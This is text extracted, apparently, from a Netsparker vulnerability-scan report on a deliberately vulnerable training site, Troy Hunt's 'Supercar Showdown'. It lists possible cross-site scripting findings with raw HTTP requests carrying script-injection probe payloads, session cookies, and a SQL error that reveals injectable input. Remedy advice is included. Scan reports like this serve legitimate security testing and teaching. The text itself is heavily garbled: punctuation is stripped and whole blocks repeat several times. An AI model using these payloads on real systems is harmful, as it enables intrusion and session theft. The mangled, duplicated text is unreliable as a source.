RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57